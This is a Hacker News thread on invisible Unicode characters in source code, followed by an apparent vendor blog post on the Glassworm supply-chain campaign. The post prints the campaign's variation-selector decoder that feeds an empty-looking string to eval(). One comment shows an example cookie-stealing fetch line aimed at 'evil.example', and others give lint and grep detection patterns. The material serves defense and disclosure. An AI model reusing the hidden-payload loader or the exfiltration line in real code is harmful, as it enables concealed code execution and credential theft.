This article is about JavaScript, although the technique can apply to other programming languages as well. Even in JavaScript, though, you can use \u escapes in place of the non-ASCII characters. (One of my ideas for a programming language designed to be a better alternative to C is that it would enforce visible ASCII (plus a few control characters, with some restrictions on their use), unless you specify by a directive or switch that you want to allow non-ASCII bytes.)
The mere fact that a software maintainer would merge code without knowing what it does says a lot about the terrible state of software.
Sure, the payload is invisible (though tbh I'm surprised it is; PUA characters usually show up as boxes with hex codes for me), but the part where you put an "empty" string through eval isn't.
If you are not reviewing your code closely enough to notice something as nonsensical as eval() on an empty string, would you really notice the non-obfuscated payload either?
Is there ever a circumstance where the invisible characters are both legitimate and you as a software developer wouldn't want to see them in the source code?
For data or code hiding, the Acme::Bleach Perl module is an old example, though by no means the oldest. Not that it matters much, given how little most people learn from history.
Invisible characters may also cause hard-to-debug issues, such as lpr(1) not working for a user who turned out to have a control character hiding in their .cshrc. Such things as hex viewers and OCD levels of attention to detail are suggested.
Sure, third-party services like the OP can provide bots that can scan. But if you create an ecosystem in which PRs can be submitted by threat actors, part of your commitment to the community should be to provide visibility into attacks that cannot be seen by the naked eye, and make that protection the norm rather than the exception.
[0] https://docs.github.com/en/get-started/learning-about-github...
Innocuous PR (but do note the line about "pedronauck pushed a commit that referenced this pull request last week"): https://github.com/pedronauck/reworm/pull/28
Original commit: https://github.com/pedronauck/reworm/commit/df8c18
Amended commit: https://github.com/pedronauck/reworm/commit/d50cd8
Either way, pretty clear sign that the owner's creds (and possibly an entire machine) are compromised.
I'm wondering about LLMs here: are people using them to make new kinds of malicious code, more sophisticated than before?
Things that vanish on a printout should not be in Unicode.
Remove them from Unicode.
My clawbot & other AI agents already have this figured out.
/s
Are people using eval() in production code?
I should be able to use Ü as a cursed smiley in text, and many more writing systems supported by Unicode support even more funny things. That's a good thing.
On the other hand, if technical and display file names (for GUI users) were separate, my need for crazy characters in file names, code bases and such is very limited. Lower ASCII for actual file names consumed by technical people is sufficient for me.
Do you honestly think this is a workable solution?
But really, it still has to be injected after the fact. Even the most superficial code review should catch it.
Then, any appearance of unprintable characters should also be flagged. There are rather few legitimate uses for zero-width characters, such as ZWJ in emoji composition. Ideally, all such characters should be written as \uNNNN escape sequences, not as literal characters.
Simple lint rules would suffice for that, with zero AI involvement.
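A lint check of that sort can indeed be a few lines. Here is a minimal sketch in Node-flavored JavaScript; the character ranges are my own choice for illustration (zero-width formats plus the variation selector blocks this campaign abuses) and would need tuning to a real policy:

```javascript
// Flag zero-width/invisible format characters and variation selectors.
// Ranges chosen for illustration only, not an exhaustive policy.
const INVISIBLES = /[\u200B-\u200F\u2060\uFEFF\uFE00-\uFE0F\u{E0100}-\u{E01EF}]/u;

function findInvisibles(source) {
  const hits = [];
  // Spread iterates code points, so astral characters are handled correctly.
  [...source].forEach((ch, i) => {
    if (INVISIBLES.test(ch)) {
      hits.push({ index: i, codePoint: 'U+' + ch.codePointAt(0).toString(16).toUpperCase() });
    }
  });
  return hits;
}

console.log(findInvisibles('const s = `a\u200Bb`;'));
// → [ { index: 12, codePoint: 'U+200B' } ]
```

Wired into CI as a pre-merge check, this fails fast with the exact position of each offending code point, with zero AI involvement.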
Unicode needs tab, space, form feed, and carriage return.
Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.
Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.
Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.
Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.
Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.
Also, this attack doesn't seem to use invisible characters, just characters that don't have an assigned meaning.
Rule of thumb: two Unicode sequences that look identical when printed should consist of the same code points.
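That rule of thumb is exactly what cross-script homoglyphs violate, and Unicode normalization does not rescue it. A quick illustration (JavaScript here, but the point is language-independent):

```javascript
// Two visually identical letters from different scripts.
const latinA = 'a';          // U+0061 LATIN SMALL LETTER A
const cyrillicA = '\u0430';  // U+0430 CYRILLIC SMALL LETTER A

console.log(latinA === cyrillicA);  // false: different code points
// Even the most aggressive normalization form keeps scripts apart:
console.log(latinA.normalize('NFKC') === cyrillicA.normalize('NFKC'));  // false
```

So tooling that wants to enforce the rule has to compare rendered confusability (e.g. script mixing within an identifier), not just normalized code points.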
It makes the product better
I know people love to talk money and costs and "value", but HN is a space for developers, not the business people. Our primary concern, as developers, is to make the product better. The business people need us to make the product better, keep the company growing, and beat out the competition. We need them to keep us from fixating on things that are useful but low priority, and to ensure we keep having money. The contention between us is good; it keeps balance. It even ensures things keep getting better if an effective monopoly forms, since they still need us, the developers, to make the company continue growing (look at monopolies people aren't angry at and how they're different). And they need us more than we need them.

So I'd argue it's the responsibility of the developers hired by GitHub to create this feature, because it makes the product better. That's the thing you've been hired for: to make the product better. Your concern isn't the money; your concern is the product. That's what you're hired for.
Yes, it's a red flag. Yes, there are legitimate uses. Yes, you should always interrogate evals more closely. All of these are true.
grep -P '[\x{200B}\x{200C}\x{200D}\x{FEFF}]' code.ts
See https://stackoverflow.com/q/78129129/223424

I have considered allowing a short list that does not include emojis, joining characters, and so on (basically just currency symbols, accent marks, and everything else you'd find in CP-1252), but never got around to it.
Emojis are another abomination that should be removed from Unicode. If you want pictures, use a gif.
Those are grandfathered in from ASCII, and only space and newline are needed. Before I check code into git, I run a program that removes the tabs and carriage returns.
> Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.
!!tfel ot thgir ,am ,kooL
> Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.
I don't believe it.
> Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.
Not needed.
> Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.
How on earth did people read printed matter without that?
> Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.
Somehow people didn't need invisible characters when printing books.
And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?
There are also languages that are written from top to bottom.
Unicode is not exclusively for coding; on the contrary, I'm pretty sure coding is only a small fraction of how Unicode is used.
> Somehow people didn't need invisible characters when printing books.
They didn't need computers either so "was seemingly not needed in the past" is not a good argument.
Look Ma
xt! N !
e tee S
T larip
(No Unicode needed.) While we're at it, we could also unify I, | and l. It's too confusing sometimes.
Yes. Unicode should not be about semantic meaning, it should be about the visual. Like text in a book.
> And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?
Yup. Consider a printed book. How can you tell if a letter is a Greek letter or a Latin letter?
Those Unicode homoglyphs are a solution looking for a problem.
And when the incremental cost to build a feature is low in an age of agentic AI, there should be no barrier to a member of the technical staff (and hopefully they're not divided into devs/test/PM like in decades past) putting a prototype together for this.
Eval for JSON also led to other security issues, like XSSI.
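The classic pattern was evaluating a JSON response instead of parsing it. JSON.parse accepts only JSON syntax and never executes code, which is why it closes that hole. A minimal sketch (the attack string in the comment is a hypothetical example):

```javascript
const payload = '{"user":"alice","admin":false}';

// Dangerous: eval runs arbitrary JavaScript if the "JSON" is attacker-controlled,
// e.g. '{};fetch("https://evil.example/steal?c=" + document.cookie)'.
// const data = eval('(' + payload + ')');

// Safe: a strict JSON parser cannot execute anything, and it throws on non-JSON input.
const data = JSON.parse(payload);
console.log(data.user);  // alice
```

The same reasoning applies to the invisible-character attack: the danger is never the string itself, it's the code path that hands a string to an evaluator.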
Do you think 1, l and I should be encoded as the same character, or does this logic only extend to characters pesky foreigners use?
I can absolutely tell Cyrillic к from Latin k, and Latin u from Cyrillic и.
> should not be about semantic meaning
It's always better to be able to preserve more information in a text and not less.
But I also think we've had a culture shift that's hurting our field, where engineers argue about whether we should implement certain features based on monetary value (which is all fictional anyway). But that's not our job. At best, it's the job of the engineering manager to convince the business people that it has not only utility value, but monetary value.
I would say they are arguing that in bad faith, so I wanted to enter a dialogue where they are either forced to agree, or more likely, not respond at all.
The invisible threat we've been tracking for nearly a year is back. While the PolinRider campaign has been making headlines for compromising hundreds of GitHub repositories, we are separately seeing a new wave of Glassworm activity hitting GitHub, npm, and VS Code.
In October last year, we wrote about how hidden Unicode characters were being used to compromise GitHub repositories, tracing the technique back to a threat actor named Glassworm. This month, the same actor is back, and among the affected repositories are some notable names: a repo from Wasmer, Reworm, and opencode-bench from anomalyco, the organization behind OpenCode and SST.
Before diving into the scale of this new wave, let’s recap how this attack works. Even after months of coverage, it continues to catch developers and tooling off guard.
The trick relies on invisible Unicode characters: code points that render as nothing in virtually every editor, terminal, and code review interface. Attackers use these invisible characters to encode a payload directly inside what appears to be an empty string. When the JavaScript runtime encounters it, a small decoder extracts the real bytes and passes them to eval().
Here's what the injection looks like. Remember, the apparent gap in the empty backticks below is anything but empty:
const s = v => [...v].map(w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
The backtick string passed to s() looks empty in every viewer, but it's packed with invisible characters that, once decoded, produce a full malicious payload. In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.
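For intuition, here is a benign sketch of the inverse mapping implied by that decoder: bytes 0 through 15 become BMP variation selectors (U+FE00 to U+FE0F), and bytes 16 through 255 map into the supplementary range (U+E0100 to U+E01EF). This is not the attacker's actual tooling, just the arithmetic, with eval() deliberately left out:

```javascript
// Encode bytes as variation selectors (the inverse of the decoder above).
const encode = bytes => [...bytes].map(b =>
  String.fromCodePoint(b < 16 ? 0xFE00 + b : 0xE0100 + b - 16)
).join('');

// The same decoding logic as in the attack sample, minus the eval().
const decode = v => [...v].map(c => {
  const w = c.codePointAt(0);
  return w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
         w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null;
}).filter(n => n !== null);

const hidden = encode(Buffer.from('console.log(1)'));
// `hidden` renders as an empty-looking string, yet it round-trips perfectly:
console.log(Buffer.from(decode(hidden)).toString('utf-8'));  // console.log(1)
```

Because every byte value has an invisible counterpart, an arbitrary UTF-8 payload of any length can ride inside a string that reviewers see as empty backticks.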
We are observing a mass campaign by the Glassworm threat actor spreading across open source repositories. A GitHub code search for the decoder pattern currently returns at least 151 matching repositories, and that number understates the true scope, since many affected repositories have already been deleted by the time of writing. The GitHub compromises appear to have taken place between March 3 and March 9.

The campaign has also expanded beyond GitHub. We are now seeing the same technique deployed in npm and the VS Code marketplace, suggesting Glassworm is operating a coordinated, multi-ecosystem push. This is consistent with the group's historical pattern of pivoting between registries.
| Package | Ecosystem | Versions | Date |
|---|---|---|---|
| @aifabrix/miso-client | npm | 4.7.2 | Mar 12, 2026 |
| @iflow-mcp/watercrawl-watercrawl-mcp | npm | 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4 | Mar 12, 2026 |
| quartz.quartz-markdown-editor | VS Code | 0.3.0 | Mar 12, 2026 |
Among the repositories we identified, several belong to well-known projects with meaningful star counts, making them high-value targets for downstream supply chain impact:
| Repository | Stars |
|---|---|
| pedronauck/reworm | 1,460 |
| pedronauck/spacefold | 62 |
| anomalyco/opencode-bench | 56 |
| doczjs/docz-plugin-css | 39 |
| uknfire/theGreatFilter | 38 |
| sillyva/rpg-schedule | 37 |
| wasmer-examples/hono-wasmer-starter | 8 |
As we noted in our October article, the malicious injections don't arrive in obviously suspicious commits. The surrounding changes are realistic: documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project.
This level of project-specific tailoring strongly suggests the attackers are using large language models to generate convincing cover commits. At the scale we're now seeing, manual crafting of 151+ bespoke code changes across different codebases simply isn't feasible.
Invisible threats require active defenses. You cannot rely on visual code review or standard linting to catch what you cannot see. At Aikido, we've built detection for invisible Unicode injection directly into our malware scanning pipeline.
If you already use Aikido, these packages would be flagged in your feed as a 100/100 critical finding.

Not on Aikido yet? Create a free account and link your repositories. The free plan includes our malware detection coverage (no credit card required).
Finally, a tool that can stop supply-chain malware in real time, as it appears, can prevent a serious infection. This is the idea behind Aikido Safe Chain, a free and open-source tool that wraps npm, npx, yarn, pnpm, and pnpx and uses both AI and human malware researchers to detect and block the latest supply chain risks before they enter your environment.
{{cta}}